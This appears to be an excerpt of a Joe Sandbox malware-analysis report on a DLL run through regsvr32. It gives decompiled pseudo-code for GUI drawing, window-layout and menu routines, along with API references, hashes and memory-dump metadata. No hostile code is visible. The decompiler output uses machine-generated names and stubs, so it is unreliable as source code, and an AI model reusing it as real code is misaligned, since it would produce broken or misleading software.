                                                                                                                				intOrPtr _t132;
                                                                                                                				struct tagRECT _t175;
                                                                                                                				intOrPtr _t179;
                                                                                                                				intOrPtr* _t181;
                                                                                                                				void* _t183;
                                                                                                                
                                                                                                                				_push(0x5c);
                                                                                                                				E1004764D(0x1008e18e, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t183 - 0x30)) = 0x1009a2fc;
                                                                                                                				 *(_t183 - 0x2c) = 0;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x28)) = 0;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x24)) = 0;
                                                                                                                				 *(_t183 - 4) = 0;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x40)) = 0x1009a2fc;
                                                                                                                				 *(_t183 - 0x3c) = 0;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x38)) = 0;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x34)) = 0;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x14)) = 0;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x18)) = 0x10098d24;
                                                                                                                				 *(_t183 - 0x1c) = 0;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x20)) = 0x1009831c;
                                                                                                                				_t181 =  *((intOrPtr*)(_t183 + 8));
                                                                                                                				 *(_t183 - 4) = 3;
                                                                                                                				if(E1000D064(_t183 - 0x30, _t181) != 0 && E1000D064(_t183 - 0x40, _t181) != 0 && GetObjectA( *( *((intOrPtr*)(_t183 + 0x14)) + 4), 0x18, _t183 - 0x68) != 0) {
                                                                                                                					L1000CFA3(_t183 - 0x18, CreateBitmap, _t183, CreateBitmap(8, 8, 1, 1, 0x1009a514));
                                                                                                                					E1000D03E(_t183 - 0x20, _t183 - 0x18);
                                                                                                                					L1000CFF6(_t183 - 0x18);
                                                                                                                					L1000CFA3(_t183 - 0x18, CreateBitmap, _t183, CreateBitmap( *(_t183 - 0x64),  *(_t183 - 0x60), 1, 1, 0));
                                                                                                                					 *((intOrPtr*)(_t183 + 0x14)) = E1000D0A1( *(_t183 - 0x2c),  *( *((intOrPtr*)(_t183 + 0x14)) + 4));
                                                                                                                					_t122 = E1000D0A1( *(_t183 - 0x3c),  *((intOrPtr*)(_t183 - 0x14)));
                                                                                                                					 *((intOrPtr*)(_t183 - 0x10)) = _t122;
                                                                                                                					if( *((intOrPtr*)(_t183 + 0x14)) != 0 && _t122 != 0) {
                                                                                                                						 *((intOrPtr*)(_t183 + 8)) = E1000BD03(GetPixel( *(_t183 - 0x2c), 0, 0), _t183 - 0x30, _t123);
                                                                                                                						E1000BD03(BitBlt( *(_t183 - 0x3c), 0, 0,  *(_t183 - 0x64),  *(_t183 - 0x60),  *(_t183 - 0x2c), 0, 0, 0xcc0020), _t183 - 0x30, 0xffffff);
                                                                                                                						E1000BD03(BitBlt( *(_t183 - 0x3c), 0, 0,  *(_t183 - 0x64),  *(_t183 - 0x60),  *(_t183 - 0x2c), 0, 0, 0xee0086), _t183 - 0x30,  *((intOrPtr*)(_t183 + 8)));
                                                                                                                						_t130 =  *((intOrPtr*)( *_t181 + 0x30))( *((intOrPtr*)(_t183 + 0x18)));
                                                                                                                						 *((intOrPtr*)(_t183 + 0x18)) = _t130;
                                                                                                                						_t132 =  *((intOrPtr*)( *_t181 + 0x2c))( *((intOrPtr*)(_t183 + 0x1c)));
                                                                                                                						_t179 =  *((intOrPtr*)(_t183 + 0x10));
                                                                                                                						_t175 =  *(_t183 + 0xc);
                                                                                                                						 *((intOrPtr*)(_t183 + 0x1c)) = _t132;
                                                                                                                						 *((intOrPtr*)(_t183 - 0x44)) =  *(_t183 - 0x60) + _t179;
                                                                                                                						 *(_t183 - 0x50) = _t175;
                                                                                                                						 *((intOrPtr*)(_t183 - 0x4c)) = _t179;
                                                                                                                						 *((intOrPtr*)(_t183 - 0x48)) =  *(_t183 - 0x64) + _t175;
                                                                                                                						FillRect( *(_t181 + 4), _t183 - 0x50,  *(_t183 - 0x1c));
                                                                                                                						 *((intOrPtr*)( *_t181 + 0x30))( *((intOrPtr*)(_t183 + 0x18)));
                                                                                                                						 *((intOrPtr*)( *_t181 + 0x2c))( *((intOrPtr*)(_t183 + 0x1c)));
                                                                                                                						E1000C436(_t181,  *(_t183 + 0xc), _t179,  *(_t183 - 0x64),  *(_t183 - 0x60), _t183 - 0x30, 0, 0, 0x660046);
                                                                                                                						E1000C436(_t181,  *(_t183 + 0xc), _t179,  *(_t183 - 0x64),  *(_t183 - 0x60), _t183 - 0x40, 0, 0, 0x8800c6);
                                                                                                                						E1000C436(_t181,  *(_t183 + 0xc), _t179,  *(_t183 - 0x64),  *(_t183 - 0x60), _t183 - 0x30, 0, 0, 0x660046);
                                                                                                                						E1000D0A1( *(_t183 - 0x3c),  *((intOrPtr*)( *((intOrPtr*)(_t183 - 0x10)) + 4)));
                                                                                                                						E1000D0A1( *(_t183 - 0x2c),  *( *((intOrPtr*)(_t183 + 0x14)) + 4));
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t183 - 4) = 2;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x20)) = 0x10098308;
                                                                                                                				L1000CFF6(_t183 - 0x20);
                                                                                                                				 *(_t183 - 4) = 1;
                                                                                                                				 *((intOrPtr*)(_t183 - 0x18)) = 0x10098308;
                                                                                                                				L1000CFF6(_t183 - 0x18);
                                                                                                                				 *(_t183 - 4) = 0;
                                                                                                                				L1000CD56(_t183 - 0x40);
                                                                                                                				 *(_t183 - 4) =  *(_t183 - 4) | 0xffffffff;
                                                                                                                				return E10047725(L1000CD56(_t183 - 0x30));
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000DDDD
                                                                                                                  • Part of subcall function 1000D064: CreateCompatibleDC.GDI32(?), ref: 1000D073
                                                                                                                • GetObjectA.GDI32(00000003,00000018,?), ref: 1000DE4D
                                                                                                                • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,1009A514), ref: 1000DE6E
                                                                                                                  • Part of subcall function 1000D03E: CreatePatternBrush.GDI32(?), ref: 1000D04D
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000DE98
                                                                                                                  • Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9
                                                                                                                • GetPixel.GDI32(?,00000000,00000000), ref: 1000DED8
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000DF05
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 1000DF29
                                                                                                                • FillRect.USER32(00000003,?,?), ref: 1000DF76
                                                                                                                  • Part of subcall function 1000C436: BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1000C45C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create$BitmapColorObject$BrushCompatibleFillH_prolog3PatternPixelRectSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1458925443-0
                                                                                                                • Opcode ID: 2049ac294c08e55e4a21875b776fc7ee10fcff62426293ab6dfae7e52ea0fcb5
                                                                                                                • Instruction ID: 77c58d3e43a35b987cd2dffd8b8a9243759cfaf0f7ba19e0065bb487ce2970d6
                                                                                                                • Opcode Fuzzy Hash: 2049ac294c08e55e4a21875b776fc7ee10fcff62426293ab6dfae7e52ea0fcb5
                                                                                                                • Instruction Fuzzy Hash: 3281D175900219AFEF11DF94CD85EEEBBBAFF08340F108029F509A6261DB71AA11DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1000D8C3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t101;
                                                                                                                				intOrPtr _t102;
                                                                                                                				intOrPtr* _t157;
                                                                                                                				void* _t159;
                                                                                                                				void* _t160;
                                                                                                                
                                                                                                                				_t160 = __eflags;
                                                                                                                				_push(0x54);
                                                                                                                				E1004764D(0x1008e110, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t159 - 0x48)) = 0x1009a2fc;
                                                                                                                				 *(_t159 - 0x44) = 0;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x40)) = 0;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x3c)) = 0;
                                                                                                                				 *(_t159 - 4) = 0;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x38)) = 0x1009a2fc;
                                                                                                                				 *(_t159 - 0x34) = 0;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x30)) = 0;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x2c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x14)) = 0;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x18)) = 0x10098d24;
                                                                                                                				 *(_t159 - 4) = 2;
                                                                                                                				_push(GetSysColor(0x14));
                                                                                                                				E1000D544(0, _t159 - 0x28, __edi, GetSysColor, _t160);
                                                                                                                				 *(_t159 - 4) = 3;
                                                                                                                				_push(GetSysColor(0x10));
                                                                                                                				E1000D544(0, _t159 - 0x20, __edi, GetSysColor, _t160);
                                                                                                                				_t157 =  *((intOrPtr*)(_t159 + 8));
                                                                                                                				 *(_t159 - 4) = 4;
                                                                                                                				if(E1000D064(_t159 - 0x48, _t157) != 0 && E1000D064(_t159 - 0x38, _t157) != 0) {
                                                                                                                					_t151 =  *((intOrPtr*)(_t159 + 0x14));
                                                                                                                					if(GetObjectA( *( *((intOrPtr*)(_t159 + 0x14)) + 4), 0x18, _t159 - 0x60) != 0 && L1000CFA3(_t159 - 0x18, _t151, _t159, CreateBitmap( *(_t159 - 0x5c),  *(_t159 - 0x58), 1, 1, 0)) != 0) {
                                                                                                                						_t101 = E1000D0A1( *(_t159 - 0x44),  *((intOrPtr*)(_t151 + 4)));
                                                                                                                						_t102 = E1000D0A1( *(_t159 - 0x34),  *((intOrPtr*)(_t159 - 0x14)));
                                                                                                                						 *((intOrPtr*)(_t159 - 0x10)) = _t102;
                                                                                                                						if(_t101 != 0 && _t102 != 0) {
                                                                                                                							 *((intOrPtr*)(_t159 + 0x14)) = E1000BD03(GetPixel( *(_t159 - 0x44), 0, 0), _t159 - 0x48, _t103);
                                                                                                                							E1000BD03(BitBlt( *(_t159 - 0x34), 0, 0,  *(_t159 - 0x5c),  *(_t159 - 0x58),  *(_t159 - 0x44), 0, 0, 0xcc0020), _t159 - 0x48, 0xffffff);
                                                                                                                							BitBlt( *(_t159 - 0x34), 0, 0,  *(_t159 - 0x5c),  *(_t159 - 0x58),  *(_t159 - 0x44), 0, 0, 0x1100a6);
                                                                                                                							E10020117(_t157,  *((intOrPtr*)(_t159 + 0xc)),  *((intOrPtr*)(_t159 + 0x10)),  *(_t159 - 0x5c),  *(_t159 - 0x58),  *((intOrPtr*)(_t159 + 0x18)));
                                                                                                                							 *((intOrPtr*)( *_t157 + 0x2c))(0xffffff);
                                                                                                                							 *((intOrPtr*)(_t159 + 8)) = E1000D13A(_t157, _t159 - 0x28);
                                                                                                                							E1000C436(_t157,  *((intOrPtr*)(_t159 + 0xc)) + 1,  *((intOrPtr*)(_t159 + 0x10)) + 1,  *(_t159 - 0x5c),  *(_t159 - 0x58), _t159 - 0x38, 0, 0, 0xe20746);
                                                                                                                							E1000D13A(_t157, _t159 - 0x20);
                                                                                                                							E1000C436(_t157,  *((intOrPtr*)(_t159 + 0xc)),  *((intOrPtr*)(_t159 + 0x10)),  *(_t159 - 0x5c),  *(_t159 - 0x58), _t159 - 0x38, 0, 0, 0xe20746);
                                                                                                                							E1000D13A(_t157,  *((intOrPtr*)(_t159 + 8)));
                                                                                                                							 *((intOrPtr*)( *_t157 + 0x2c))( *((intOrPtr*)(_t159 + 0x14)));
                                                                                                                							E1000D0A1( *(_t159 - 0x34),  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x10)) + 4)));
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t159 - 4) = 3;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x20)) = 0x10098308;
                                                                                                                				L1000CFF6(_t159 - 0x20);
                                                                                                                				 *(_t159 - 4) = 2;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x28)) = 0x10098308;
                                                                                                                				L1000CFF6(_t159 - 0x28);
                                                                                                                				 *(_t159 - 4) = 1;
                                                                                                                				 *((intOrPtr*)(_t159 - 0x18)) = 0x10098308;
                                                                                                                				L1000CFF6(_t159 - 0x18);
                                                                                                                				 *(_t159 - 4) = 0;
                                                                                                                				L1000CD56(_t159 - 0x38);
                                                                                                                				 *(_t159 - 4) =  *(_t159 - 4) | 0xffffffff;
                                                                                                                				return E10047725(L1000CD56(_t159 - 0x48));
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000D8CA
                                                                                                                • GetSysColor.USER32 ref: 1000D907
                                                                                                                  • Part of subcall function 1000D544: __EH_prolog3.LIBCMT ref: 1000D54B
                                                                                                                  • Part of subcall function 1000D544: CreateSolidBrush.GDI32(00000000), ref: 1000D566
                                                                                                                • GetSysColor.USER32 ref: 1000D918
                                                                                                                  • Part of subcall function 1000D064: CreateCompatibleDC.GDI32(?), ref: 1000D073
                                                                                                                • GetObjectA.GDI32(00000004,00000018,?), ref: 1000D958
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000D971
                                                                                                                  • Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9
                                                                                                                • GetPixel.GDI32(?,00000000,00000000), ref: 1000D9B8
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000D9E5
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 1000DA09
                                                                                                                  • Part of subcall function 10020117: SetBkColor.GDI32(?,?), ref: 10020126
                                                                                                                  • Part of subcall function 10020117: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 10020158
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000000), ref: 1000D15C
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000004), ref: 1000D172
                                                                                                                  • Part of subcall function 1000C436: BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1000C45C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$CreateSelect$H_prolog3$BitmapBrushCompatiblePixelSolidText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2841110477-0
                                                                                                                • Opcode ID: 7ca8c7a22dcc9177c41a1f071a1246e83baa6db38511a8c6ac0d58135de08f41
                                                                                                                • Instruction ID: 9a0a8619dc2d9126584e789a73e267e3b9ea50487815501d297b1d3d9f768c12
                                                                                                                • Opcode Fuzzy Hash: 7ca8c7a22dcc9177c41a1f071a1246e83baa6db38511a8c6ac0d58135de08f41
                                                                                                                • Instruction Fuzzy Hash: FE61147590024DAEEF01EFD4CC81AEEBF7AFF08390F104029F505A62A5DB31AA51DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E100143DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
                                                                                                                				int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				int _v16;
                                                                                                                				int _v20;
                                                                                                                				struct tagRECT _v36;
                                                                                                                				void* _v40;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t61;
                                                                                                                				int _t62;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t72;
                                                                                                                				intOrPtr* _t85;
                                                                                                                				signed int _t87;
                                                                                                                				struct HWND__* _t91;
                                                                                                                				void* _t92;
                                                                                                                
                                                                                                                				_t72 = __ecx;
                                                                                                                				_t75 = _a28;
                                                                                                                				_v8 = 0;
                                                                                                                				_v12 = _a28;
                                                                                                                				_v16 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				if(_a24 == 0) {
                                                                                                                					GetClientRect( *(__ecx + 0x20),  &_v36);
                                                                                                                				} else {
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                				}
                                                                                                                				_t61 = _a16 & 0xffff7fff;
                                                                                                                				_a24 = _t61;
                                                                                                                				if(_t61 == 1) {
                                                                                                                					_t13 =  &_v40;
                                                                                                                					 *_t13 = _v40 & 0x00000000;
                                                                                                                					__eflags =  *_t13;
                                                                                                                				} else {
                                                                                                                					_v40 = BeginDeferWindowPos(8);
                                                                                                                				}
                                                                                                                				_t62 = GetTopWindow( *(_t72 + 0x20));
                                                                                                                				while(1) {
                                                                                                                					_t91 = _t62;
                                                                                                                					if(_t91 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					_t87 = GetDlgCtrlID(_t91) & 0x0000ffff;
                                                                                                                					_t64 = E10014011(_t75, _t87, _t91, __eflags, _t91);
                                                                                                                					__eflags = _t87 - _a12;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags = _t87 - _a4;
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							__eflags = _t87 - _a8;
                                                                                                                							if(__eflags <= 0) {
                                                                                                                								__eflags = _t64;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									SendMessageA(_t91, 0x361, 0,  &_v40);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_v8 = _t91;
                                                                                                                					}
                                                                                                                					_t62 = GetWindow(_t91, 2);
                                                                                                                				}
                                                                                                                				if(_a24 != 1) {
                                                                                                                					__eflags = _a12;
                                                                                                                					if(_a12 != 0) {
                                                                                                                						__eflags = _v8;
                                                                                                                						if(_v8 != 0) {
                                                                                                                							_t62 = E10013FEA(0, _t75, _t92, _v8);
                                                                                                                							__eflags = _a24 - 2;
                                                                                                                							if(_a24 == 2) {
                                                                                                                								_t85 = _a20;
                                                                                                                								_v36.left = _v36.left +  *_t85;
                                                                                                                								_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
                                                                                                                								_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
                                                                                                                								_t45 =  &(_v36.bottom);
                                                                                                                								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                								__eflags =  *_t45;
                                                                                                                							}
                                                                                                                							__eflags = _a16 & 0x00008000;
                                                                                                                							if((_a16 & 0x00008000) == 0) {
                                                                                                                								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
                                                                                                                								_t62 = E10011DDB( &_v40, _v8,  &_v36);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					__eflags = _v40;
                                                                                                                					if(_v40 != 0) {
                                                                                                                						_t62 = EndDeferWindowPos(_v40);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if(_a28 == 0) {
                                                                                                                						_t62 = _a20;
                                                                                                                						 *((intOrPtr*)(_t62 + 8)) = _v20;
                                                                                                                						 *((intOrPtr*)(_t62 + 4)) = 0;
                                                                                                                						 *_t62 = 0;
                                                                                                                						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
                                                                                                                					} else {
                                                                                                                						_t62 = CopyRect(_a20,  &_v36);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t62;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1228040700-0
                                                                                                                • Opcode ID: 36d96a6004295ee8964788e3fef955f8b2bbd6967ee6e7cb077654b0102e99cd
                                                                                                                • Instruction ID: 31ad4884e3354c04f2d6a1acc6d05d77f59a758a5659da4c2f1deca1f34cf055
                                                                                                                • Opcode Fuzzy Hash: 36d96a6004295ee8964788e3fef955f8b2bbd6967ee6e7cb077654b0102e99cd
                                                                                                                • Instruction Fuzzy Hash: D841387190021ADFDF14DF94C984AEEB7B5FF09311B12816AE905AB261CB34DE81CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1003DA97(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t32;
                                                                                                                				char* _t39;
                                                                                                                				char* _t49;
                                                                                                                				intOrPtr _t54;
                                                                                                                				void* _t63;
                                                                                                                				char* _t66;
                                                                                                                				signed int _t74;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_t63 = __edx;
                                                                                                                				_t56 = __ecx;
                                                                                                                				_push(4);
                                                                                                                				E1004764D(0x10091295, __ebx, __edi, __esi);
                                                                                                                				_t54 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx + 0xc8)) = 1;
                                                                                                                				_t32 = 0x80c83b00;
                                                                                                                				if(( *(_t76 + 0xc) & 0x00000004) != 0) {
                                                                                                                					_t32 = 0x80c83300;
                                                                                                                				}
                                                                                                                				if(E10042700(_t56, 0, 0, 0x1009c448, _t32, 0x100b9964,  *((intOrPtr*)(_t76 + 8)), 0) != 0) {
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t74 = ( ~( *(_t76 + 0xc) & 0x00005000) & 0xfffff000) + 0x00002000 |  *(_t76 + 0xc) & 0x00000040;
                                                                                                                					_push(GetSystemMenu( *(_t54 + 0x20), 0));
                                                                                                                					_t66 = E1001E527(_t54, _t56, 0, _t74, __eflags);
                                                                                                                					__eflags = _t66;
                                                                                                                					if(_t66 != 0) {
                                                                                                                						DeleteMenu(_t66[4], 0xf000, 0);
                                                                                                                						DeleteMenu(_t66[4], 0xf020, 0);
                                                                                                                						DeleteMenu(_t66[4], 0xf030, 0);
                                                                                                                						DeleteMenu(_t66[4], 0xf120, 0);
                                                                                                                						L1000140B(_t76 + 0xc, E100184C0());
                                                                                                                						 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;
                                                                                                                						_t49 = L10001276(_t76 + 0xc, 0xf011);
                                                                                                                						__eflags = _t49;
                                                                                                                						if(_t49 != 0) {
                                                                                                                							DeleteMenu(_t66[4], 0xf060, 0);
                                                                                                                							AppendMenuA(_t66[4], 0, 0xf060,  *(_t76 + 0xc));
                                                                                                                						}
                                                                                                                						 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
                                                                                                                						__eflags =  &(( *(_t76 + 0xc))[0xfffffffffffffff0]);
                                                                                                                						L100013E3( &(( *(_t76 + 0xc))[0xfffffffffffffff0]), _t63);
                                                                                                                						_t54 =  *((intOrPtr*)(_t76 - 0x10));
                                                                                                                					}
                                                                                                                					_t67 = _t54 + 0xe4;
                                                                                                                					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0xe4)) + 0x168))( *((intOrPtr*)(_t76 + 8)), _t74 | 0x50000000, 0xe81f);
                                                                                                                					__eflags = _t39;
                                                                                                                					if(_t39 != 0) {
                                                                                                                						E1003C8A7(_t67, _t54);
                                                                                                                						_t39 = 1;
                                                                                                                					}
                                                                                                                					 *(_t54 + 0xc8) =  *(_t54 + 0xc8) & 0x00000000;
                                                                                                                					goto L4;
                                                                                                                				} else {
                                                                                                                					 *(_t54 + 0xc8) = 0;
                                                                                                                					L4:
                                                                                                                					return E10047725(_t39);
                                                                                                                				}
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$AppendH_prolog3System
                                                                                                                • String ID:
                                                                                                                • API String ID: 1427010815-0
                                                                                                                • Opcode ID: d06b4b862f9a5b80e34edea4264a3b5332d43d1af25b555bc7d8b90be42379dd
                                                                                                                • Instruction ID: 465dc8e43b2d3f75baccc30aa32fbdcf2a0b44af295c82506afed976036a6668
                                                                                                                • Opcode Fuzzy Hash: d06b4b862f9a5b80e34edea4264a3b5332d43d1af25b555bc7d8b90be42379dd
                                                                                                                • Instruction Fuzzy Hash: 6B31D075640606BBEB21DF20CD86FAE7B65FF44754F108224FA28AE1E2CB70A910D758
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E100112DC(struct HDC__* _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				struct tagPOINT _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				struct tagRECT _v44;
                                                                                                                				int _t29;
                                                                                                                				void* _t31;
                                                                                                                				int _t33;
                                                                                                                				int _t37;
                                                                                                                				struct HDC__* _t53;
                                                                                                                
                                                                                                                				if(L10010FF9() == 0) {
                                                                                                                					if(_a12 != 0) {
                                                                                                                						_v28.left = 0;
                                                                                                                						_v28.top = 0;
                                                                                                                						_v28.right = GetSystemMetrics(0);
                                                                                                                						_t29 = GetSystemMetrics(1);
                                                                                                                						_t53 = _a4;
                                                                                                                						_v28.bottom = _t29;
                                                                                                                						if(_t53 == 0) {
                                                                                                                							if(_a8 == 0) {
                                                                                                                								L16:
                                                                                                                								_t31 = _a12(0x12340042, _t53,  &_v28, _a16);
                                                                                                                								L17:
                                                                                                                								L18:
                                                                                                                								return _t31;
                                                                                                                							}
                                                                                                                							_t33 = IntersectRect( &_v28,  &_v28, _a8);
                                                                                                                							L14:
                                                                                                                							if(_t33 != 0) {
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							L15:
                                                                                                                							_t31 = 1;
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						_t37 = GetClipBox(_t53,  &_v44);
                                                                                                                						if(_t37 == 0) {
                                                                                                                							L11:
                                                                                                                							_t31 = 0;
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						if(_t37 == 1) {
                                                                                                                							goto L15;
                                                                                                                						}
